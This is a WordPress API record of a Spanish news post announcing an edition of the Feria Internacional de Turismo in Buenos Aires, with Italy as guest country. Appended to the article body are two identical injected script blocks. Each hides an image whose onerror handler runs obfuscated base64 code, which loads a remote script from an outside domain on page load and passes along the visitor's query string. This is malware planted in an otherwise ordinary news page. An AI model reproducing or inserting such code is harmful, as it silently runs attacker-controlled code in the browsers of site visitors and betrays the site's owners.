{"id":3154,"date":"2023-10-01T11:06:55","date_gmt":"2023-10-01T14:06:55","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3154"},"modified":"2025-08-14T00:07:38","modified_gmt":"2025-08-14T03:07:38","slug":"comienzo-una-nueva-edicion-de-la-fit","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3154","title":{"rendered":"Comienzo una nueva edici\u00f3n de la FIT"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#0a4567\"><em>La Feria Internacional de Turismo, en la que Italia es \u201cpa\u00eds invitado\u201d, tendr\u00e1 dos jornadas abiertas al p\u00fablico y otras dos dedicadas a profesionales del sector.<\/em><\/h4>\n\n\n\n<p>Una nueva edici\u00f3n de la\u00a0<strong>Feria Internacional del Turismo<\/strong>\u00a0comenzar\u00e1 ma\u00f1ana en el predio de La Rural de Buenos Aires, con un acto de apertura del que participar\u00e1 el ministro de Turismo y Deportes de la Naci\u00f3n,\u00a0<strong>Mat\u00edas Lammens<\/strong>, y los presidentes de la FIT,\u00a0<strong>Andr\u00e9s Dey\u00e1<\/strong>, y de la C\u00e1mara Argentina de Turismo (CAT),\u00a0<strong>Gustavo Hani<\/strong>.<\/p>\n\n\n\n<p><strong>Organizada por la FAEVYT<\/strong>&nbsp;(Federaci\u00f3n Argentina de Asociaciones de Empresas de Viajes y Turismo) y la AVIABUE (Asociaci\u00f3n de Agencias de Viajes y Turismo de Buenos Aires), la feria fue declarada \u201cde inter\u00e9s nacional\u201d y cuenta con el apoyo del Ministerio de Turismo y Deportes de la Naci\u00f3n como patrocinador principal. Este a\u00f1o,&nbsp;<strong>el pa\u00eds invitado ser\u00e1 Italia<\/strong>.<\/p>\n\n\n\n<p>La FIT estar\u00e1 abierta al p\u00fablico durante sus&nbsp;<em>dos primeras jornadas (s\u00e1bado 30 y domingo 1) de 14 a 21, en tanto que el lunes 2 y el martes 3 ser\u00e1 de acceso exclusivo para profesionales del sector tur\u00edstico (de 10 a 19)<\/em>. La superficie prevista para expositores en el predio con ingreso por la calle Sarmiento supera los n\u00fameros de la \u00faltima edici\u00f3n previa a la pandemia.<\/p>\n\n\n\n<p>Entre las actividades incluidas en una agenda intensa y variada, ma\u00f1ana est\u00e1 prevista una charla sobre pol\u00edticas p\u00fablicas para el desarrollo del turismo accesible en el auditorio institucional del Ministerio, \u00e1mbito en el que tambi\u00e9n se realizar\u00e1 el&nbsp;<em>lanzamiento de la Fiesta Nacional de la Chaya 2024 y las presentaciones del impacto positivo generado con las cinco ediciones de PreViaje y el desarrollo del programa La Ruta Natural<\/em>.<\/p>\n\n\n\n<p>Adem\u00e1s, habr\u00e1 un&nbsp;<strong>espacio promocional y el turismo del vino y la gastronom\u00eda nacional tendr\u00e1n por primera vez un stand propio<\/strong>, \u201cArgentina, tierra de vinos\u201d, con un trabajo articulado entre el Ministerio y la Corporaci\u00f3n Vitivin\u00edcola Argentina (COVIAR), que permitir\u00e1 acceder a una experiencia inmersiva para conocer m\u00e1s sobre las bodegas abiertas al turismo en las provincias vitivin\u00edcolas. A la vez, habr\u00e1 un escenario para Fiestas Argentinas.<\/p>\n\n\n\n<p>En el transcurso de la feria tambi\u00e9n recibir\u00e1n la distinci\u00f3n&nbsp;<strong>\u201cembajador de la Marca Pa\u00eds Argentina\u201d<\/strong>&nbsp;figuras del deporte, la gastronom\u00eda y el espect\u00e1culo, tales como el piloto&nbsp;<strong>Franco Colapinto<\/strong>, el empresario&nbsp;<strong>Pablo Rivero<\/strong>&nbsp;y el cantante&nbsp;<strong>Abel Pintos<\/strong>, entre otros referentes.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Feria Internacional de Turismo, en la que Italia es \u201cpa\u00eds invitado\u201d, tendr\u00e1 dos jornadas abiertas al p\u00fablico y otras dos dedicadas a profesionales del sector. Una nueva edici\u00f3n de la\u00a0Feria Internacional del Turismo\u00a0comenzar\u00e1 ma\u00f1ana en el predio de La Rural de Buenos Aires, con un acto de apertura del que participar\u00e1 el ministro de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3155,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-3154","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3154"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3154"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3154\/revisions"}],"predecessor-version":[{"id":6952,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3154\/revisions\/6952"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3155"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3154"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3154"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3154"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}